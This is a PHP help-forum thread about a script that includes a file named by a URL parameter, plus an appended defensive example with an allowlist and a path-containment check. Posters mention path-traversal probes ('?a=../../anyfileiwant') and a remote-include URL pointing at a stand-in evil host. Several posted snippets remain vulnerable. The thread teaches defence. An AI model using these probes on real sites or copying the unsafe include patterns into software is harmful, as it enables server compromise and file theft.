A simple include script problem!


glav
Forum Newbie
Posts: 13
Joined: Sat Feb 25, 2006 1:54 pm

Post by glav »

feyd | Please use [code], [/code] and [syntax="..."] tags where appropriate when posting code. Your post has been edited to reflect how we'd like it posted. Please read: Posting Code in the Forums (http://forums.devnetwork.net/viewtopic.php?t=21171) to learn how to do it too.


OK - I have a small problem but it's bugging me out.

The little script I'm using is

<?php
// $a arrives straight from the request (register_globals), which is what makes this include unsafe
if (@$a) {
    include $a . ".inc";
} else {
    include "main.inc";   // was the bare constant `main`; quoted so it no longer raises a notice
}
?>
First of all, I think I should ask these questions one at a time and get the answer for the first one before asking the second.
That's for my own benefit, so I don't get confused.

Question 1: In this script, if the value for $a does not exist, does the script then load main.php, or does it only load main.php when the variable is not passed?

What I mean is this: http://www.sitename.com/index.php?a=nosuchfile

Does main.php load

OR

http://www.sitename.com/index.php

Only loads when the variable is not passed.

Or does it load for both cases.

Thanks


feyd
Neighborhood Spidermoddy
Posts: 31559
Joined: Mon Mar 29, 2004 3:24 pm
Location: Bothell, Washington, USA

Post by feyd »

There's a thread linked from Useful Posts you need to read regarding this type of code.
Zoxive
Forum Regular
Posts: 974
Joined: Fri Apr 01, 2005 4:37 pm
Location: Bay City, Michigan

Post by Zoxive »

What's with the error suppression?

if (!empty($_GET['a'])) {
    // $_GET['a'] Also Should be Filtered/Escaped/Checked
    include($_GET['a'] . '.inc'); // Edit: Forgot `.`
} else {
    include('main.inc');
}
Last edited by Zoxive on Sun Oct 07, 2007 3:50 pm, edited 2 times in total.
glav
Forum Newbie
Posts: 13
Joined: Sat Feb 25, 2006 1:54 pm

Post by glav »

Zoxive, I tried that and got the error.

Warning: main(jetlagphp) [function.main]: failed to open stream:

the '.' is missing

so I put it in and tried to call a page that does not exist and I got this error

Warning: main(jetlag2.php) [function.main]: failed to open stream:

and yes the extension I use is .php not .inc

Thanks
Zoxive
Forum Regular
Posts: 974
Joined: Fri Apr 01, 2005 4:37 pm
Location: Bay City, Michigan

Post by Zoxive »

glav wrote: Zoxive, I tried that and got the error.

Warning: main(jetlagphp) [function.main]: failed to open stream:

the '.' is missing

so I put it in and tried to call a page that does not exist and I got this error

Warning: main(jetlag2.php) [function.main]: failed to open stream:

and yes the extension I use is .php not .inc

Thanks
Well, you need to do more Checking.

Right now it is only seeing if the variable $_GET['a'] exists, and then it tries to include it.

$Ext = '.php';
// I would like to note again..
// $_GET['a'] Also Should be Filtered/Escaped/Checked
if (!empty($_GET['a']) && file_exists($_GET['a'] . $Ext)) {   // closing parenthesis of file_exists() was missing
    include($_GET['a'] . $Ext);
} else {
    include('main.inc');
}
If I go to your site, I could easily put sitename.com/index.php?a=../../anyfileiwant
glav
Forum Newbie
Posts: 13
Joined: Sat Feb 25, 2006 1:54 pm

Post by glav »

Zoxive, first of all the '.' was not missing, it was my mistake.

When I try the new piece of code you wrote, it only loads the main.php page even if the value for a exists.

Thanks for the help.
feyd
Neighborhood Spidermoddy
Posts: 31559
Joined: Mon Mar 29, 2004 3:24 pm
Location: Bothell, Washington, USA

Post by feyd »

Have you read the thread I referred to in the first response?
glav
Forum Newbie
Posts: 13
Joined: Sat Feb 25, 2006 1:54 pm

Post by glav »

feyd, I'm reading it at the moment.

Ok I’ve finished reading that, some snaky posts there, lots of fun.

Did it help? Yes, a little, but I'll have to read a little more before I understand everything that was mentioned.


Thanks
glav
Forum Newbie
Posts: 13
Joined: Sat Feb 25, 2006 1:54 pm

Post by glav »

OK Zoxive & feyd, I figured out why this was not working for me. I am using this on a new site that is based around a premade app that I wanted to use. When I tried your script, Zoxive, it did the same thing my own version did, and when I tried it on a site without the premade app it worked fine. The reason was because I had to put the location in the file_exists function like this:

$Ext = '.php';
// I would like to note again..
// $_GET['a'] Also Should be Filtered/Escaped/Checked
if (!empty($_GET['a']) && file_exists("template/hhi/" . $_GET['a'] . $Ext)) {   // concatenation dot and closing parenthesis were missing
    include($_GET['a'] . $Ext);   // relative include: resolved via include_path, then the calling script's directory
} else {
    include('main.inc');
}
This was because the index.php file was in wwwroot/or/ and the values for $a were in wwwroot/or/template/hhi/

What I need to figure out is how to load the premade app into the wwwroot/ dir and load the $a values from there also.

Thanks for the help.
Zoxive
Forum Regular
Posts: 974
Joined: Fri Apr 01, 2005 4:37 pm
Location: Bay City, Michigan

Post by Zoxive »

I have yet to acquire the ability to read minds and know exactly what the structure of your website is, to give you exact code.

On a serious note, we are here to help you learn, give advice and point you in the right direction. So when you get code examples here (IF you do; I was feeling generous today), most of the time you still need to tweak them to your apps.
glav
Forum Newbie
Posts: 13
Joined: Sat Feb 25, 2006 1:54 pm

Post by glav »

Even though I have read the thread feyd forwarded me to, I'm still a little confused about what steps I should use to secure the include method.

I need to make sure that the files are in certain folders only and that a hacker cannot enter index.php?a=../../../somefile

Would this be enough, or am I prone to an easy attack still?

Thanks
RobertGonzalez
Site Administrator
Posts: 14293
Joined: Tue Sep 09, 2003 6:04 pm
Location: Fremont, CA, USA

Post by RobertGonzalez »

Read that thread carefully. There are a lot of security topics covered in there, all of which you should use when allowing dynamic includes from user input.
mrkite
Forum Contributor
Posts: 104
Joined: Tue Sep 11, 2007 4:19 am

Post by mrkite »

Even worse, make sure a hacker can't say index.php?a=http://myevilsite.com/blah.txt

because php will download blah.txt and execute the php code in it as if it were running locally.

I find it easiest to just do:

$_GET['a'] = preg_replace('|/|', '', $_GET['a']);
Which should prevent people from passing paths or urls to your include statement.
RobertGonzalez
Site Administrator
Posts: 14293
Joined: Tue Sep 09, 2003 6:04 pm
Location: Fremont, CA, USA

Post by RobertGonzalez »

The safest way would be to not allow users to tell your application which page to include directly.
s.dot
Tranquility In Moderation
Posts: 5001
Joined: Sun Feb 06, 2005 7:18 pm
Location: Indiana

Post by s.dot »

A much more elegant solution would use file_exists() on the include file. An even more elegant solution wouldn't pass the filename via $_GET, but instead perhaps a number which indicates a specific file.
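An added example, not code from the thread or from any of its posters, that puts the advice from RobertGonzalez and s.dot into working PHP and also covers glav's requirement that included files must stay inside one folder. Pattern 1 is an allowlist that maps the ?a= key to a file, so the request never names a file at all; pattern 2 resolves a candidate with realpath() and checks that it is contained in the page directory, which rejects ../ traversal, absolute paths and URL wrappers such as the http:// case mrkite raised. The page directory, file names and test inputs are constructed for the demo, and it assumes PHP 7.1 or later.

```php
<?php
// Added example (not from the thread): two defensive patterns for a ?a=page include.
// All paths, page names and inputs below are constructed for the demo.

declare(strict_types=1);

/** Pattern 1 allowlist: request key => file inside the page directory. */
const PAGES = [
    'main'  => 'main.php',
    'about' => 'about.php',
];

/** Pattern 1: return the allowed file for $key, or the default page. */
function page_from_allowlist(?string $key, string $default = 'main'): string
{
    return PAGES[$key] ?? PAGES[$default];
}

/**
 * Pattern 2: resolve $name to an absolute path inside $pageDir, or return null.
 * Rejects traversal ("../x"), absolute paths, URL wrappers ("http://...") and
 * names that do not resolve to an existing regular file under $pageDir.
 */
function resolve_page(string $name, string $pageDir, string $ext = '.php'): ?string
{
    // Only a simple file stem is accepted: letters, digits, underscore, hyphen.
    if (!preg_match('/^[A-Za-z0-9_-]+$/', $name)) {
        return null;
    }
    $base      = realpath($pageDir);
    $candidate = realpath($pageDir . DIRECTORY_SEPARATOR . $name . $ext);
    if ($base === false || $candidate === false || !is_file($candidate)) {
        return null;
    }
    // Containment check: after symlink resolution the file must still be under $base.
    return strpos($candidate, $base . DIRECTORY_SEPARATOR) === 0 ? $candidate : null;
}

/** Demo: build a throwaway page directory and exercise both patterns on sample inputs. */
function demo(): array
{
    $dir = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'include_demo_' . getmypid();
    @mkdir($dir, 0700, true);
    file_put_contents($dir . '/main.php',  "<?php echo 'main';\n");
    file_put_contents($dir . '/about.php', "<?php echo 'about';\n");

    // Constructed request values: one legitimate, one unknown, three hostile.
    $inputs  = ['about', 'nosuchfile', '../../etc/passwd', 'http://example.invalid/x.txt', '/etc/passwd'];
    $results = [];
    foreach ($inputs as $a) {
        $resolved     = resolve_page($a, $dir);
        $results[$a]  = [
            'allowlist' => page_from_allowlist($a),                       // hostile/unknown -> main.php
            'resolved'  => $resolved === null ? null : basename($resolved), // hostile/unknown -> null
        ];
    }

    // Remove the throwaway directory again.
    unlink($dir . '/main.php');
    unlink($dir . '/about.php');
    rmdir($dir);
    return $results;
}

if (PHP_SAPI === 'cli') {
    print_r(demo());
} else {
    // As a web page: look the key up in the allowlist, then include the chosen file.
    // The pages/ directory is an assumed layout, not the thread author's.
    $a = $_GET['a'] ?? null;
    include __DIR__ . '/pages/' . page_from_allowlist(is_string($a) ? $a : null);
}
```

Running it from the command line prints the demo table: only `about` resolves to `about.php`, every other input falls back to `main.php` under the allowlist and to `null` under the containment check. The allowlist is the stronger of the two because the request value is never used as a path component at all; the realpath() check is what to reach for when the set of pages is too large or too dynamic to enumerate, and the is_file() test keeps it from accepting a directory or a dangling symlink.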